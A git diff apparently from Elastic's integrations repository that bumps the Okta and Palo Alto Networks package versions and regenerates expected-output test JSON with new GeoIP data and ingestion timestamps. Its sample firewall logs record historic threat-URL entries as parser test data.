States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", @@ -385,7 +367,10 @@ "name": "Mac" }, "version": "72.0." - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/okta/manifest.yml b/packages/okta/manifest.yml index a30e8f399b2..e5e007749e8 100644 --- a/packages/okta/manifest.yml +++ b/packages/okta/manifest.yml @@ -1,6 +1,6 @@ name: okta title: Okta Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect and parse event logs from Okta API with Elastic Agent. type: integration diff --git a/packages/panw/changelog.yml b/packages/panw/changelog.yml index deb834ec225..acfd13f285c 100644 --- a/packages/panw/changelog.yml +++ b/packages/panw/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset 
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json index b8d4ac9e903..16c8c057868 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json @@ -12,7 +12,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366911400Z", + "ingested": "2021-12-14T14:49:54.397819335Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,CONFIG,0,0,2012/02/25 00:51:50,192.168.0.2,,set,admin,Web,Succeeded, config shared local-user-database user badguy,0,0x0", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -41,7 +41,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366915600Z", + "ingested": "2021-12-14T14:49:54.397821530Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:22,192.168.0.2,,set,admin,Web,Succeeded, config mgt-config users badguy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -70,7 +70,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366922Z", + "ingested": "2021-12-14T14:49:54.397821980Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:40,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", 
@@ -99,7 +99,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366928400Z", + "ingested": "2021-12-14T14:49:54.397822363Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:53:53,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -128,7 +128,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366932800Z", + "ingested": "2021-12-14T14:49:54.397822703Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:53:56,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -157,7 +157,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366937100Z", + "ingested": "2021-12-14T14:49:54.397823048Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:54:16,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -186,7 +186,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366942Z", + "ingested": "2021-12-14T14:49:54.397823392Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,ras,0,2012/02/25 00:54:16,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", 
@@ -215,7 +215,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366946400Z", + "ingested": "2021-12-14T14:49:54.397823739Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:17,192.168.0.2,,edit,badguy,Web,Succeeded, vsys vsys1 profiles url-filtering monzyspolicy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -244,7 +244,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366950100Z", + "ingested": "2021-12-14T14:49:54.397824082Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:36,192.168.0.2,,commit,badguy,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -273,7 +273,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366955Z", + "ingested": "2021-12-14T14:49:54.397824435Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:57:49,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -302,7 +302,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366959500Z", + "ingested": "2021-12-14T14:49:54.397824780Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:57:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", 
@@ -331,7 +331,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366964400Z", + "ingested": "2021-12-14T14:49:54.397825317Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,routing,0,2012/02/25 00:58:12,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -360,7 +360,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366968300Z", + "ingested": "2021-12-14T14:49:54.397825685Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,vpn,0,2012/02/25 00:58:12,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -389,7 +389,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366973100Z", + "ingested": "2021-12-14T14:49:54.397826060Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,ras,0,2012/02/25 00:58:12,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -418,7 +418,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366979100Z", + "ingested": "2021-12-14T14:49:54.397826426Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,1,2012/02/25 00:58:14,,unknown,,0,0,general,informational,Config installed,909,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", 
@@ -447,7 +447,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366986600Z", + "ingested": "2021-12-14T14:49:54.397826765Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,0,2012/02/25 00:59:36,,general,,0,0,general,informational,Log type config cleared by user badguy ,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -476,7 +476,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366992800Z", + "ingested": "2021-12-14T14:49:54.397827234Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,general,1,2012/04/10 03:11:57,,unknown,,0,0,general,informational,Config installed,884,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -505,7 +505,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366998700Z", + "ingested": "2021-12-14T14:49:54.397827586Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:11:56,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -534,7 +534,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367003500Z", + "ingested": "2021-12-14T14:49:54.397827927Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,vpn,0,2012/04/10 03:11:56,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", 
@@ -563,7 +563,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367008400Z", + "ingested": "2021-12-14T14:49:54.397828280Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,routing,0,2012/04/10 03:11:56,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -592,7 +592,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367014400Z", + "ingested": "2021-12-14T14:49:54.397828626Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:06:11,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -621,7 +621,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367018900Z", + "ingested": "2021-12-14T14:49:54.397828977Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/10 03:06:00,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -650,7 +650,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367023800Z", + "ingested": "2021-12-14T14:49:54.397829341Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,general,1,2012/04/09 09:02:53,,unknown,,0,0,general,informational,Config installed,840,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", 
@@ -679,7 +679,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367029900Z", + "ingested": "2021-12-14T14:49:54.397829795Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:02:52,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -708,7 +708,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367034600Z", + "ingested": "2021-12-14T14:49:54.397830152Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:02:52,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -737,7 +737,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367039600Z", + "ingested": "2021-12-14T14:49:54.397830503Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/09 09:02:52,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -766,7 +766,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367044500Z", + "ingested": "2021-12-14T14:49:54.397830848Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:00:55,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", 
@@ -795,7 +795,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367050400Z", + "ingested": "2021-12-14T14:49:54.397831212Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:00:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -824,7 +824,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367054600Z", + "ingested": "2021-12-14T14:49:54.397831563Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:35,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -853,7 +853,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367059600Z", + "ingested": "2021-12-14T14:49:54.397831909Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20,192.168.0.2,,edit,admin,Web,Succeeded, vsys vsys1 profiles data-objects PII,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -882,7 +882,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367065600Z", + "ingested": "2021-12-14T14:49:54.397832256Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", 
@@ -911,7 +911,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367070500Z", + "ingested": "2021-12-14T14:49:54.397832600Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -940,7 +940,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367076200Z", + "ingested": "2021-12-14T14:49:54.397832941Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -962,26 +962,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1077,7 +1072,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:42:57.367080500Z", + "ingested": "2021-12-14T14:49:54.397833290Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json index 0f69e78be65..36af282422f 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json @@ -8,22 +8,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -126,7 +121,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.078988500Z", + "ingested": "2021-12-14T14:49:56.151570718Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -151,22 +146,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -269,7 +259,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.078997900Z", + "ingested": "2021-12-14T14:49:56.151573439Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -294,22 +284,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -412,7 +397,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079001800Z", + "ingested": "2021-12-14T14:49:56.151573828Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -437,22 +422,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -555,7 +535,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079006500Z", + "ingested": "2021-12-14T14:49:56.151574237Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -580,22 +560,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -698,7 +673,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079012400Z", + "ingested": "2021-12-14T14:49:56.151574613Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -723,22 +698,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -841,7 +811,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079018400Z", + "ingested": "2021-12-14T14:49:56.151575011Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -866,22 +836,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -984,7 +949,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079024200Z", + "ingested": "2021-12-14T14:49:56.151575383Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1009,22 +974,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1127,7 +1087,7 @@ }, "event": { "severity": 